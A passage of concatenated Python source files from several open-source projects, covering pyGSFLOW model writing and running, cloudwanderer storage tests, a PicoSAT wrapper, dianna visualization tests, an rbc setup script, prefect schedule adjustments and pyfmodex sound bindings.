if "GSFLOW" in mode.upper() or "MODFLOW" in mode.upper():
print("Working on loading MODFLOW files ....")
modflow = GsflowModel._load_modflow(
control, mf_load_only, model_ws, forgive
)
print("MODFLOW files are loaded ... ")
else:
prms_only = True
modflow_only = False
print("Mode is set to PRMS only, loading PRMS model only")
return GsflowModel(
control=control,
prms=prms,
mf=modflow,
modflow_only=modflow_only,
prms_only=prms_only,
gsflow_exe=gsflow_exe,
modsim=modsim,
)
@staticmethod
def _load_modflow(control, mf_load_only, model_ws=None, forgive=False):
"""
        The package files in the .nam file are relative to the executable
        gsflow. Here we set the model_ws to the location of the gsflow exe, via
        the control file or a user-supplied model_ws parameter.
Parameters
----------
control : ControlFile object
control file object
mf_load_only : list
list of packages to restrict modflow loading to
model_ws : str
optional parameter that allows the use to set the model_ws
forgive : bool
forgive file load errors in modflow
Returns
-------
Modflow object
"""
name = control.get_values("modflow_name")
control_file = control.control_file
if model_ws is None:
name = gsflow_io.get_file_abs(
control_file=control_file, fn=name[0]
)
model_ws, name = os.path.split(name)
else:
model_ws = gsflow_io.get_file_abs(model_ws=model_ws)
name = name[0]
control_file = None
return Modflow.load(
name,
model_ws=model_ws,
control_file=control_file,
load_only=mf_load_only,
forgive=forgive,
)
def write_input(self, basename=None, workspace=None, write_only=None):
"""
Write input files for gsflow. Four cases are possible:
        (1) if basename and workspace are None, then the existing files will be overwritten
        (2) if basename is specified, only file names will be changed
        (3) if only workspace is specified, only the folder will be changed
        (4) when both basename and workspace are specified, both are changed
Parameters
----------
basename : str
project basename
workspace : str
model output directory
write_only: a list
['control', 'parameters', 'prms_data', 'mf', 'modsim']
Examples
--------
>>> gsf = gsflow.GsflowModel.load_from_file('gsflow.control')
>>> gsf.write_input(basename="new", workspace="../new_model")
"""
print("Writing the project files .....")
if workspace is not None:
workspace = os.path.abspath(workspace)
if (basename, workspace) == (None, None):
print("Warning: input files will be overwritten....")
self._write_all(write_only)
# only change the directory
elif basename is None and workspace is not None:
if not (os.path.isdir(workspace)):
os.mkdir(workspace)
fnn = os.path.basename(self.control.control_file)
self.control.model_dir = workspace
self.control.control_file = os.path.join(workspace, fnn)
self.control_file = os.path.join(workspace, fnn)
if self.prms is not None:
self.prms.control_file = self.control_file
# change parameters
new_param_file_list = []
for par_record in self.prms.parameters.parameters_list:
curr_file = os.path.basename(par_record.file_name)
curr_file = os.path.join(workspace, curr_file)
par_record.file_name = curr_file
if not (curr_file in new_param_file_list):
new_param_file_list.append(curr_file)
self.control.set_values("param_file", new_param_file_list)
# change datafile
curr_file = os.path.relpath(
os.path.join(workspace, self.prms.data.name),
self.control.model_dir,
)
self.prms.data.model_dir = workspace
self.control.set_values("data_file", [curr_file])
# change mf
if self.mf is not None:
self.mf.change_model_ws(workspace, reset_external=True)
mfnm = self.mf.name + ".nam"
self.control.set_values("modflow_name", [mfnm])
# update file names in control object
self._update_control_fnames(workspace, basename)
# write
if self.prms is not None:
self.prms.control = self.control
self._write_all(write_only)
# only change the basename
elif basename is not None and workspace is None:
cnt_file = basename + "_cont.control"
ws_ = os.path.dirname(self.control.control_file)
self.control.control_file = os.path.join(ws_, cnt_file)
self.control_file = os.path.join(ws_, cnt_file)
self.prms.control_file = self.control_file
# change parameters
flist = self.prms.parameters.parameter_files
new_param_file_list = []
for ifile, par_record in enumerate(
self.prms.parameters.parameters_list
):
file_index = flist.index(par_record.file_name)
par_file = basename + "_par_{}.params".format(file_index)
curr_dir = self.control.model_dir
curr_file = os.path.join(curr_dir, par_file)
par_record.file_name = curr_file
if not (curr_file in new_param_file_list):
new_param_file_list.append(curr_file)
self.control.set_values("param_file", new_param_file_list)
# change datafile
dfile = basename + "_dat.data"
curr_file = os.path.relpath(
os.path.join(self.prms.data.model_dir, dfile),
self.control.model_dir,
)
self.prms.data.name = dfile
self.control.set_values("data_file", [curr_file])
# change mf
if self.mf is not None:
curr_dir = self.mf.model_ws
self.mf._set_name(basename)
self._update_mf_basename(basename)
mfnm = self.mf.name + ".nam"
self.control.set_values("modflow_name", [mfnm])
# update file names in control object
self._update_control_fnames(workspace, basename)
self.prms.control = self.control
self._write_all(write_only)
# change both directory & basename
elif basename is not None and workspace is not None:
if not (os.path.isdir(workspace)):
os.mkdir(workspace)
cnt_file = basename + "_cont.control"
self.control.model_dir = workspace
self.control.control_file = os.path.join(workspace, cnt_file)
self.prms.control_file = self.control.control_file
self.control_file = self.control.control_file
# change parameters
# get param files list
flist = self.prms.parameters.parameter_files
new_param_file_list = []
for ifile, par_record in enumerate(
self.prms.parameters.parameters_list
):
file_index = flist.index(par_record.file_name)
par_file = basename + "_par_{}.params".format(file_index)
curr_file = os.path.join(workspace, par_file)
par_record.file_name = curr_file
if not (curr_file in new_param_file_list):
new_param_file_list.append(curr_file)
self.control.set_values("param_file", new_param_file_list)
# change datafile
dfile = basename + "_dat.data"
curr_file = os.path.relpath(
os.path.join(workspace, dfile), self.control.model_dir
)
self.prms.data.model_dir = workspace
self.prms.data.name = dfile
self.control.set_values("data_file", [curr_file])
            # change mf
if self.mf is not None:
self.mf.change_model_ws(workspace)
self.mf._set_name(os.path.join(workspace, basename))
self._update_mf_basename(basename)
mfnm = basename + ".nam"
self.control.set_values(
"modflow_name",
[
os.path.relpath(
os.path.join(workspace, mfnm), self.control.model_dir
)
],
)
# update file names in control object
self._update_control_fnames(workspace, basename)
self.prms.control = self.control
self._write_all(write_only)
else:
raise NotImplementedError()
def _update_control_fnames(self, workspace, basename):
"""
Method to update control file names and paths
Parameters
----------
workspace : str
model output directory
basename : str
project basename
"""
if workspace is not None and basename is None:
self.control.model_dir = workspace
for rec_name in GsConstant.GSFLOW_FILES:
if rec_name in self.control.record_names:
file_values = self.control.get_values(rec_name)
file_value = []
for fil in file_values:
va = os.path.join(workspace, os.path.basename(fil))
va = os.path.relpath(va, self.control.model_dir)
file_value.append(va)
self.control.set_values(rec_name, file_value)
else:
for rec_name in GsConstant.GSFLOW_FILES:
if rec_name in self.control.record_names:
if rec_name in ("modflow_name",):
continue
elif rec_name in (
"modflow_name",
"param_file",
"data_file",
):
file_values = self.control.get_values(rec_name)
file_value = []
for fil in file_values:
ws, filvalue = os.path.split(fil)
if not ws:
pass
else:
filvalue = os.path.relpath(
fil, self.control.model_dir
)
file_value.append(filvalue)
self.control.set_values(rec_name, file_value)
else:
file_values = self.control.get_values(rec_name)
file_value = []
for fil in file_values:
if workspace is None:
workspace = self.control.model_dir
vvfile = rec_name.split("_")
del vvfile[-1]
vvfile = "_".join(vvfile)
if "." in fil:
ext = fil.split(".")[-1]
else:
ext = "dat"
vvfile = basename + "_" + vvfile + "." + ext
filvalue = os.path.join(workspace, vvfile)
filvalue = os.path.relpath(
filvalue, self.control.model_dir
)
file_value.append(filvalue)
self.control.set_values(rec_name, file_value)
def _update_mf_basename(self, basename):
"""
        Convenience method to update the Modflow basename
Parameters
----------
basename : str
basename of the Modflow object
"""
out_files_list = []
for ix, out_file in enumerate(self.mf.output_fnames):
if out_file.count(".") > 1:
ext = out_file.split(".")
del ext[0]
ext = ".".join(ext)
else:
ext = out_file.split(".")[-1]
new_outfn = "{}.{}".format(basename, ext)
out_files_list.append(new_outfn)
self.mf.output_fnames = out_files_list
def _write_all(self, write_only):
"""
Method to write input files
Parameters
----------
write_only : list
list of files to write accepts,
control, parameters, prms_data, mf, and modsim
"""
write_only_options = (
"control",
"parameters",
"prms_data",
"mf",
"modsim",
)
if write_only is not None:
if not isinstance(write_only, list):
raise ValueError("write_only agrgument must be a list")
# make write options case insensitive
write_only = [i.lower() for i in write_only]
for write_option in write_only:
if not (write_option in write_only_options):
raise ValueError(
"The option '{}' is not recognized...".format(
write_option
)
)
else:
write_only = ()
# write control
if len(write_only) == 0 or "control" in write_only:
print("Writing Control file ...")
self.control.write()
if self.prms is not None:
# self write parameters
if len(write_only) == 0 or "parameters" in write_only:
print("Writing Parameters files ...")
self.prms.parameters.write()
# write data
if len(write_only) == 0 or "prms_data" in write_only:
print("Writing Data file ...")
self.prms.data.write()
# write mf
if self.mf is not None:
if len(write_only) == 0 or "mf" in write_only:
print("Writing Modflow files...")
self.mf.write_input()
if self.modsim is not None:
if len(write_only) == 0 or "modsim" in write_only:
print("Writing MODSIM shapefile")
self.modsim.write_modsim_shapefile()
def run_model(self, model_ws=".", forgive=False, gsflow_exe=None):
"""
Method to run a gsflow model
Parameters
----------
model_ws : str
parameter to specify the model directory
forgive : bool
forgives convergence issues
        gsflow_exe : str or None
path to gsflow_exe, if gsflow_exe is None it will use
the previously defined gsflow_exe variable or the default
gsflow.exe.
Returns
-------
None or (success, buffer)
Examples
--------
>>> gsf = gsflow.GsflowModel.load_from_file("gsflow.control")
>>> gsf.run_model()
"""
fn = self.control_file
if gsflow_exe is None:
gsflow_exe = self.gsflow_exe
if not os.path.isfile(gsflow_exe):
print(
"Warning : The executable of the model could not be found. "
"Use the gsflow_exe= parameter to define its path... "
)
return None
normal_msg = [
"normal termination",
] # , "simulation successful"]
if forgive:
normal_msg.append("failed to meet solver convergence criteria")
return self.__run(
exe_name=gsflow_exe,
namefile=fn,
normal_msg=normal_msg,
model_ws=model_ws,
)
def _generate_batch_file(self):
fn = os.path.dirname(self.control_file)
fn = os.path.join(fn, "__run_gsflow.bat")
self.__bat_file = fn
fidw = open(fn, "w")
exe = os.path.normpath(os.path.join(os.getcwd(), self.gsflow_exe))
cmd = exe + " " + self.control_file
fidw.write(cmd)
fidw.close()
def __run(
self,
exe_name,
namefile,
model_ws=".",
silent=False,
report=False,
normal_msg="normal termination",
cargs=None,
):
"""
This function will run the model using subprocess.Popen.
Parameters
----------
exe_name : str
Executable name (with path, if necessary) to run.
namefile : str
Namefile of model to run. The namefile must be the
filename of the namefile without the path.
model_ws : str
Path to the location of the namefile. (default is the
current working directory - './')
silent : boolean
Echo run information to screen (default is True).
report : boolean, optional
Save stdout lines to a list (buff) which is returned
by the method . (default is False).
normal_msg : str
Normal termination message used to determine if the
run terminated normally. (default is 'normal termination')
cargs : str or list of strings
additional command line arguments to pass to the executable.
Default is None
Returns
-------
(success, buff)
success : boolean
buff : list of lines of stdout
"""
def is_exe(fpath):
return os.path.isfile(fpath) and os.access(fpath, os.X_OK)
def which(program):
fpath, fname = os.path.split(program)
if fpath:
if is_exe(program):
return program
else:
# test for exe in current working directory
if is_exe(program):
return program
# test for exe in path statement
for path in os.environ["PATH"].split(os.pathsep):
path = path.strip('"')
exe_file = os.path.join(path, program)
if is_exe(exe_file):
return exe_file
return None
success = False
buff = []
# convert normal_msg to lower case for comparison
if isinstance(normal_msg, str):
normal_msg = [normal_msg.lower()]
elif isinstance(normal_msg, list):
for idx, s in enumerate(normal_msg):
normal_msg[idx] = s.lower()
# Check to make sure that program and namefile exist
exe = which(exe_name)
if exe is None:
            if platform.system() == "Windows":
if not exe_name.lower().endswith(".exe"):
exe = which(exe_name + ".exe")
if exe is None:
s = "The program {} does not exist or is not executable.".format(
exe_name
)
raise Exception(s)
else:
if not silent:
s = "pyGSFLOW is using the following executable to run the model: {}".format(
exe
)
print(s)
exe = os.path.normpath(os.path.join(os.getcwd(), exe))
if not os.path.isfile(os.path.join(model_ws, namefile)):
s = "The namefile for this model does not exists: {}".format(
namefile
)
raise Exception(s)
# simple little function for the thread to target
# def q_output(output, q):
# for line in iter(output.readline, b''):
# q.put(line)
# time.sleep(1)
# output.close()
# create a list of arguments to pass to Popen
argv = [exe, namefile]
# add additional arguments to Popen arguments
if cargs is not None:
if isinstance(cargs, str):
cargs = [cargs]
for t in cargs:
argv.append(t)
# run the model with Popen
# if platform.system().lower() == "windows":
# self._generate_batch_file()
# cargv = self.__bat_file
# else:
# pass
model_ws = os.path.dirname(self.control_file)
proc = sp.Popen(argv, stdout=sp.PIPE, stderr=sp.STDOUT, cwd=model_ws)
while True:
line = proc.stdout.readline()
c = line.decode("utf-8")
if c != "":
for msg in normal_msg:
if msg in c.lower():
success = True
break
c = c.rstrip("\r\n")
if not silent:
print("{}".format(c))
if report:
buff.append(c)
else:
break
return success, buff
| 2.484375 | 2 |
tests/integration/storage_memory/test_storage_memory_write.py | Sam-Martin/cloud-wanderer | 1 | 11326 | <filename>tests/integration/storage_memory/test_storage_memory_write.py
import logging
import pytest
from moto import mock_ec2, mock_iam, mock_sts
from cloudwanderer.cloud_wanderer_resource import CloudWandererResource
from cloudwanderer.storage_connectors import MemoryStorageConnector
from cloudwanderer.urn import URN
from tests.pytest_helpers import create_ec2_instances
logger = logging.getLogger(__name__)
@pytest.fixture(scope="function")
def memory_connector(request):
connector = MemoryStorageConnector()
connector.init()
return connector
def get_inferred_ec2_instances(cloudwanderer_boto3_session):
return [
CloudWandererResource(
urn=URN(
account_id="111111111111",
region="eu-west-2",
service="ec2",
resource_type="instance",
resource_id_parts=[instance.instance_id],
),
resource_data=instance.meta.data,
)
for instance in cloudwanderer_boto3_session.resource("ec2").instances.all()
]
def inferred_ec2_vpcs(cloudwanderer_boto3_session):
return [
CloudWandererResource(
urn=URN(
account_id="111111111111",
region="eu-west-2",
service="ec2",
resource_type="vpc",
resource_id_parts=[vpc.vpc_id],
),
resource_data=vpc.meta.data,
)
for vpc in cloudwanderer_boto3_session.resource("ec2").vpcs.all()
]
@pytest.fixture
def iam_role():
return CloudWandererResource(
urn=URN(
account_id="111111111111",
region="us-east-1",
service="iam",
resource_type="role",
resource_id_parts=["test-role"],
),
resource_data={"RoleName": "test-role", "InlinePolicyAttachments": [{"PolicyNames": ["test-role"]}]},
dependent_resource_urns=[
URN(
account_id="111111111111",
region="us-east-1",
service="iam",
resource_type="role_policy",
resource_id_parts=["test-role", "test-role-policy"],
)
],
)
@pytest.fixture
def iam_role_policies():
return [
CloudWandererResource(
urn=URN(
account_id="111111111111",
region="us-east-1",
service="iam",
resource_type="role_policy",
resource_id_parts=["test-role", "test-role-policy-1"],
),
resource_data={},
parent_urn=URN(
account_id="111111111111",
region="us-east-1",
service="iam",
resource_type="role",
resource_id_parts=["test-role"],
),
),
CloudWandererResource(
urn=URN(
account_id="111111111111",
region="us-east-1",
service="iam",
resource_type="role_policy",
resource_id_parts=["test-role", "test-role-policy-2"],
),
resource_data={},
parent_urn=URN(
account_id="111111111111",
region="us-east-1",
service="iam",
resource_type="role",
resource_id_parts=["test-role"],
),
),
]
@mock_sts
@mock_iam
def test_write_resource_and_attribute(memory_connector, iam_role):
memory_connector.write_resource(resource=iam_role)
result = memory_connector.read_resource(urn=iam_role.urn)
assert result.urn == iam_role.urn
assert result.role_name == "test-role"
logger.info(result.cloudwanderer_metadata.resource_data)
assert result.inline_policy_attachments == [{"PolicyNames": ["test-role"]}]
assert result.dependent_resource_urns == [
URN(
account_id="111111111111",
region="us-east-1",
service="iam",
resource_type="role_policy",
resource_id_parts=["test-role", "test-role-policy"],
)
]
@mock_sts
@mock_ec2
def test_write_and_delete_instances(memory_connector, cloudwanderer_boto3_session):
create_ec2_instances()
inferred_ec2_instances = get_inferred_ec2_instances(cloudwanderer_boto3_session)
memory_connector.write_resource(resource=inferred_ec2_instances[0])
result_before_delete = memory_connector.read_resource(urn=inferred_ec2_instances[0].urn)
memory_connector.delete_resource(urn=inferred_ec2_instances[0].urn)
result_after_delete = memory_connector.read_resource(urn=inferred_ec2_instances[0].urn)
assert result_before_delete.urn == inferred_ec2_instances[0].urn
assert result_after_delete is None
@mock_sts
@mock_ec2
def test_write_and_delete_resource_of_type_in_account_region(memory_connector, cloudwanderer_boto3_session):
create_ec2_instances(count=5)
inferred_ec2_instances = get_inferred_ec2_instances(cloudwanderer_boto3_session)
for i in range(5):
memory_connector.write_resource(resource=inferred_ec2_instances[i])
memory_connector.delete_resource_of_type_in_account_region(
cloud_name="aws",
service="ec2",
resource_type="instance",
account_id="111111111111",
region="eu-west-2",
cutoff=None,
)
remaining_urns = [
resource.urn for resource in memory_connector.read_resources(service="ec2", resource_type="instance")
]
assert remaining_urns == []
def test_delete_subresources_from_resource(memory_connector, iam_role, iam_role_policies):
"""If we are deleting a parent resource we should delete all its subresources."""
memory_connector.write_resource(resource=iam_role)
memory_connector.write_resource(resource=iam_role_policies[0])
memory_connector.write_resource(resource=iam_role_policies[1])
role_before_delete = memory_connector.read_resource(urn=iam_role.urn)
role_policy_1_before_delete = memory_connector.read_resource(urn=iam_role_policies[0].urn)
role_policy_2_before_delete = memory_connector.read_resource(urn=iam_role_policies[1].urn)
# Delete the parent and ensure the subresources are also deleted
memory_connector.delete_resource(urn=iam_role.urn)
role_after_delete = memory_connector.read_resource(urn=iam_role.urn)
role_policy_1_after_delete = memory_connector.read_resource(urn=iam_role_policies[0].urn)
role_policy_2_after_delete = memory_connector.read_resource(urn=iam_role_policies[1].urn)
assert role_before_delete.urn == iam_role.urn
assert role_policy_1_before_delete.urn == iam_role_policies[0].urn
assert role_policy_2_before_delete.urn == iam_role_policies[1].urn
assert role_after_delete is None
assert role_policy_1_after_delete is None
assert role_policy_2_after_delete is None
| 1.875 | 2 |
tt/satisfiability/picosat.py | fkromer/tt | 233 | 11327 | <reponame>fkromer/tt
"""Python wrapper around the _clibs PicoSAT extension."""
import os
from tt.errors.arguments import (
InvalidArgumentTypeError,
InvalidArgumentValueError)
if os.environ.get('READTHEDOCS') != 'True':
from tt._clibs import picosat as _c_picosat
VERSION = _c_picosat.VERSION
def sat_one(clauses, assumptions=None):
"""Find a solution that satisfies the specified clauses and assumptions.
This provides a light Python wrapper around the same method in the PicoSAT
C-extension. While completely tested and usable, this method is probably
not as useful as the interface provided through the
:func:`sat_one <tt.expressions.bexpr.BooleanExpression.sat_one>` method in
the :class:`BooleanExpression <tt.expressions.bexpr.BooleanExpression>`
class.
:param clauses: CNF (AND of ORs) clauses; positive integers represent
non-negated terms and negative integers represent negated terms.
:type clauses: List[List[:class:`int <python:int>`]]
:param assumptions: Assumed terms; same negation logic from ``clauses``
applies here. Note that assumptions *cannot* be an empty list; leave it
as ``None`` if there are no assumptions to include.
:type assumptions: List[:class:`int <python:int>`]
:returns: If solution is found, a list of ints representing the terms of
the solution; otherwise, if no solution found, ``None``.
:rtype: List[:class:`int <python:int>`] or ``None``
:raises InvalidArgumentTypeError: If ``clauses`` is not a list of lists of
ints or ``assumptions`` is not a list of ints.
:raises InvalidArgumentValueError: If any literal ints are equal to zero.
Let's look at a simple example with no satisfiable solution::
>>> from tt import picosat
>>> picosat.sat_one([[1], [-1]]) is None
True
Here's an example where a solution exists::
>>> picosat.sat_one([[1, 2, 3], [-2, -3], [1, -2], [2, -3], [-2]])
[1, -2, -3]
Finally, here's an example using assumptions::
>>> picosat.sat_one([[1, 2, 3], [2, 3]], assumptions=[-1, -3])
[-1, 2, -3]
"""
try:
return _c_picosat.sat_one(clauses, assumptions=assumptions)
except TypeError as e:
raise InvalidArgumentTypeError(str(e))
except ValueError as e:
raise InvalidArgumentValueError(str(e))
def sat_all(clauses, assumptions=None):
"""Find all solutions that satisfy the specified clauses and assumptions.
This provides a light Python wrapper around the same method in the PicoSAT
C-extension. While completely tested and usable, this method is probably
not as useful as the interface provided through the
:func:`sat_all <tt.expressions.bexpr.BooleanExpression.sat_all>` method in
the :class:`BooleanExpression <tt.expressions.bexpr.BooleanExpression>`
class.
:param clauses: CNF (AND of ORs) clauses; positive integers represent
non-negated terms and negative integers represent negated terms.
:type clauses: List[List[:class:`int <python:int>`]]
:param assumptions: Assumed terms; same negation logic from ``clauses``
applies here. Note that assumptions *cannot* be an empty list; leave it
as ``None`` if there are no assumptions to include.
:type assumptions: List[:class:`int <python:int>`]
:returns: An iterator of solutions; if no satisfiable solutions exist, the
iterator will be empty.
:rtype: Iterator[List[:class:`int <python:int>`]]
:raises InvalidArgumentTypeError: If ``clauses`` is not a list of lists of
ints or ``assumptions`` is not a list of ints.
:raises InvalidArgumentValueError: If any literal ints are equal to zero.
Here's an example showing the basic usage::
>>> from tt import picosat
>>> for solution in picosat.sat_all([[1], [2, 3, 4], [2, 3]]):
... print(solution)
...
[1, 2, 3, 4]
[1, 2, 3, -4]
[1, 2, -3, 4]
[1, 2, -3, -4]
[1, -2, 3, 4]
[1, -2, 3, -4]
We can cut down on some of the above solutions by including an assumption::
>>> for solution in picosat.sat_all([[1], [2, 3, 4], [2, 3]],
... assumptions=[-3]):
... print(solution)
...
[1, 2, -3, 4]
[1, 2, -3, -4]
"""
try:
return _c_picosat.sat_all(clauses, assumptions=assumptions)
except TypeError as e:
raise InvalidArgumentTypeError(str(e))
except ValueError as e:
raise InvalidArgumentValueError(str(e))
| 2.6875 | 3 |
tests/test_text_visualization.py | dianna-ai/dianna | 9 | 11328 | import os
import re
import shutil
import unittest
from pathlib import Path
from dianna.visualization.text import highlight_text
class Example1:
original_text = 'Doloremque aliquam totam ut. Aspernatur repellendus autem quia deleniti. Natus accusamus ' \
'doloribus et in quam officiis veniam et. '
explanation = [('ut', 25, -0.06405025896517044),
('in', 102, -0.05127647027074053),
('et', 99, 0.02254588506724936),
('quia', 58, -0.0008216335740370412),
('aliquam', 11, -0.0006268298968242725),
('Natus', 73, -0.0005556223616156406),
('totam', 19, -0.0005126140261410219),
('veniam', 119, -0.0005058379023790869),
('quam', 105, -0.0004573258796550468),
('repellendus', 40, -0.0003253862469633824)]
class Example2:
expected_html = '<html><body><span style="background:rgba(255, 0, 0, 0.08)">such</span> ' \
'<span style="background:rgba(255, 0, 0, 0.01)">a</span> <span style="background:rgba(0, 0, 255, 0.800000)">' \
'bad</span> <span style="background:rgba(0, 0, 255, 0.059287)">movie</span>.</body></html>\n'
original_text = 'Such a bad movie.'
explanation = [('bad', 7, -0.4922624307995777),
('such', 0, 0.04637815000309109),
('movie', 11, -0.03648111256069627),
('a', 5, 0.008377155657765745)]
class MyTestCase(unittest.TestCase):
temp_folder = 'temp_text_visualization_test'
html_file_path = str(Path(temp_folder) / 'output.html')
def test_text_visualization_no_output(self):
highlight_text(Example1.explanation, original_text=Example1.original_text)
assert not Path(self.html_file_path).exists()
def test_text_visualization_html_output_exists(self):
highlight_text(Example1.explanation, original_text=Example1.original_text,
output_html_filename=self.html_file_path)
assert Path(self.html_file_path).exists()
def test_text_visualization_html_output_contains_text(self):
highlight_text(Example1.explanation, original_text=Example1.original_text,
output_html_filename=self.html_file_path)
assert Path(self.html_file_path).exists()
with open(self.html_file_path, encoding='utf-8') as result_file:
result = result_file.read()
for word in _split_text_into_words(Example1.original_text):
assert word in result
def test_text_visualization_html_output_is_correct(self):
highlight_text(Example2.explanation, original_text=Example2.original_text,
output_html_filename=self.html_file_path)
assert Path(self.html_file_path).exists()
with open(self.html_file_path, encoding='utf-8') as result_file:
result = result_file.read()
assert result == Example2.expected_html
def test_text_visualization_show_plot(self):
highlight_text(Example1.explanation, original_text=Example1.original_text,
show_plot=True)
def setUp(self) -> None:
os.mkdir(self.temp_folder)
def tearDown(self) -> None:
shutil.rmtree(self.temp_folder, ignore_errors=True)
def _split_text_into_words(text):
# regex taken from
# https://stackoverflow.com/questions/12683201/python-re-split-to-split-by-spaces-commas-and-periods-but-not-in-cases-like
# explanation: split by \s (whitespace), and only split by commas and
# periods if they are not followed (?!\d) or preceded (?<!\d) by a digit.
regex = r'\s|(?<!\d)[,.](?!\d)'
return re.split(regex, text)
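# Hedged illustration (added): the digit guards keep decimal numbers intact while
# still splitting on whitespace and on ordinary commas/periods.
if __name__ == '__main__':
    print(_split_text_into_words('price 3.5 rose.'))
    # -> ['price', '3.5', 'rose', '']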
| 2.953125 | 3 |
setup.py | guilhermeleobas/rbc | 0 | 11329 | import os
import sys
import builtins
import versioneer
if sys.version_info[:2] < (3, 7):
raise RuntimeError("Python version >= 3.7 required.")
builtins.__RBC_SETUP__ = True
if os.path.exists('MANIFEST'):
os.remove('MANIFEST')
CONDA_BUILD = int(os.environ.get('CONDA_BUILD', '0'))
CONDA_ENV = os.environ.get('CONDA_PREFIX', '') != ''
from setuptools import setup, find_packages # noqa: E402
DESCRIPTION = "RBC - Remote Backend Compiler Project"
LONG_DESCRIPTION = """
The aim of the Remote Backend Compiler project is to distribute the
tasks of a program JIT compilation process to separate computer
systems using the client-server model. The frontend of the compiler
runs on the client computer and the backend runs on the server
computer. The compiler frontend will send the program code to compiler
backend in IR form where it will be compiled to machine code.
"""
def setup_package():
src_path = os.path.dirname(os.path.abspath(sys.argv[0]))
old_path = os.getcwd()
os.chdir(src_path)
sys.path.insert(0, src_path)
if CONDA_BUILD or CONDA_ENV:
        # conda dependencies are specified in meta.yaml, or the conda
        # environment should provide the correct requirements - using
        # PyPI is unreliable, see below.
install_requires = []
setup_requires = []
tests_require = []
else:
        # Get requirements via PyPI. Use at your own risk, as more than
        # once the numba and llvmlite versions have not matched.
install_requires = open('requirements.txt', 'r').read().splitlines()
setup_requires = ['pytest-runner', 'cffi']
tests_require = ['pytest']
metadata = dict(
name='rbc-project',
description=DESCRIPTION,
long_description=LONG_DESCRIPTION,
license='BSD',
version=versioneer.get_version(),
cmdclass=versioneer.get_cmdclass(),
author='<NAME>',
maintainer='<NAME>',
author_email='<EMAIL>',
url='https://github.com/xnd-project/rbc',
platforms='Cross Platform',
classifiers=[
"Intended Audience :: Developers",
"License :: OSI Approved :: BSD License",
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Programming Language :: Python :: 3.9',
"Operating System :: OS Independent",
"Topic :: Software Development",
],
packages=find_packages(),
package_data={'': ['*.thrift']},
cffi_modules=['rbc/rbclib//_rbclib_build.py:ffibuilder'],
install_requires=install_requires,
setup_requires=setup_requires,
tests_require=tests_require,
)
try:
setup(**metadata)
finally:
del sys.path[0]
os.chdir(old_path)
return
if __name__ == '__main__':
setup_package()
del builtins.__RBC_SETUP__
| 1.882813 | 2 |
src/prefect/schedules/adjustments.py | concreted/prefect | 8,633 | 11330 | """
Schedule adjustments are functions that accept a `datetime` and modify it in some way.
Adjustments have the signature `Callable[[datetime], datetime]`.
"""
from datetime import datetime, timedelta
from typing import Callable
import pendulum
import prefect.schedules.filters
def add(interval: timedelta) -> Callable[[datetime], datetime]:
"""
Adjustment that adds a specified interval to the date.
Args:
- interval (timedelta): the amount of time to add
Returns:
        - Callable[[datetime], datetime]: the adjustment function
"""
def _adjustment_fn(dt: datetime) -> datetime:
return pendulum.instance(dt) + interval
return _adjustment_fn
def next_weekday(dt: datetime) -> datetime:
"""
Adjustment that advances a date to the next weekday. If the date is already a weekday,
it is returned unadjusted.
Args:
- dt (datetime): the datetime to adjust
Returns:
- datetime: the adjusted datetime
"""
pdt = pendulum.instance(dt)
while not prefect.schedules.filters.is_weekday(pdt):
pdt = pdt.add(days=1)
return pdt
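# Hedged usage sketch (added for illustration; not part of the original module):
# compose the helpers above by shifting a date one day forward and then rolling
# it to the next weekday. The concrete dates are illustrative only.
if __name__ == "__main__":
    saturday = pendulum.datetime(2021, 1, 2)    # a Saturday
    shifted = add(timedelta(days=1))(saturday)  # -> Sunday 2021-01-03
    print(next_weekday(shifted))                # -> Monday 2021-01-04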
| 3.484375 | 3 |
src/pyfmodex/sound.py | Loodoor/UnamedPy | 1 | 11331 | from .fmodobject import *
from .fmodobject import _dll
from .structures import TAG, VECTOR
from .globalvars import get_class
class ConeSettings(object):
def __init__(self, sptr):
self._sptr = sptr
self._in = c_float()
self._out = c_float()
self._outvol = c_float()
ckresult(_dll.FMOD_Sound_Get3DConeSettings(self._sptr, byref(self._in), byref(self._out), byref(self._outvol)))
@property
def inside_angle(self):
return self._in.value
@inside_angle.setter
def inside_angle(self, angle):
self._in = c_float(angle)
self._commit()
@property
def outside_angle(self):
return self._out.value
@outside_angle.setter
def outside_angle(self, angle):
self._out = c_float(angle)
self._commit()
@property
def outside_volume(self):
return self._outvol.value
@outside_volume.setter
def outside_volume(self, vol):
self._outvol = c_float(vol)
self._commit()
def _commit(self):
ckresult(_dll.FMOD_Sound_Set3DConeSettings(self._sptr, self._in, self._out, self._outvol))
class Sound(FmodObject):
def add_sync_point(self, offset, offset_type, name):
s_ptr = c_void_p()
ckresult(_dll.FMOD_Sound_AddSyncPoint(self._ptr, offset, offset_type, name, byref(s_ptr)))
return s_ptr
def delete_sync_point(self, point):
ckresult(_dll.FMOD_Sound_DeleteSyncPoint(self._ptr, point))
@property
def threed_cone_settings(self):
return ConeSettings(self._ptr)
@property
def custom_rolloff(self):
"""Returns the custom rolloff curve.
:rtype: List of [x, y, z] lists.
"""
num = c_int()
self._call_fmod("FMOD_Sound_Get3DCustomRolloff", None, byref(num))
curve = (VECTOR * num.value)()
self._call_fmod("FMOD_Sound_Get3DCustomRolloff", byref(curve), 0)
return [p.to_list() for p in curve]
@custom_rolloff.setter
def custom_rolloff(self, curve):
"""Sets the custom rolloff curve.
:param curve: The curve to set.
:type curve: A list of something that can be treated as a list of [x, y, z] values e.g. implements indexing in some way.
"""
native_curve = (VECTOR * len(curve))(*[VECTOR.from_list(lst) for lst in curve])
self._call_fmod("FMOD_Sound_Set3DCustomRolloff", native_curve, len(native_curve))
@property
def _min_max_distance(self):
min = c_float()
max = c_float()
ckresult(_dll.FMOD_Sound_Get3DMinMaxDistance(self._ptr, byref(min), byref(max)))
return (min.value, max.value)
@_min_max_distance.setter
def _min_max_distance(self, dists):
ckresult(_dll.FMOD_Sound_Set3DMinMaxDistance(self._ptr, c_float(dists[0]), c_float(dists[1])))
@property
def min_distance(self):
return self._min_max_distance[0]
@min_distance.setter
def min_distance(self, dist):
self._min_max_distance = (dist, self._min_max_distance[1])
@property
def max_distance(self):
return self._min_max_distance[1]
@max_distance.setter
def max_distance(self, dist):
self._min_max_distance = (self._min_max_distance[0], dist)
@property
def _defaults(self):
freq = c_float()
vol = c_float()
pan = c_float()
pri = c_int()
ckresult(_dll.FMOD_Sound_GetDefaults(self._ptr, byref(freq), byref(vol), byref(pan), byref(pri)))
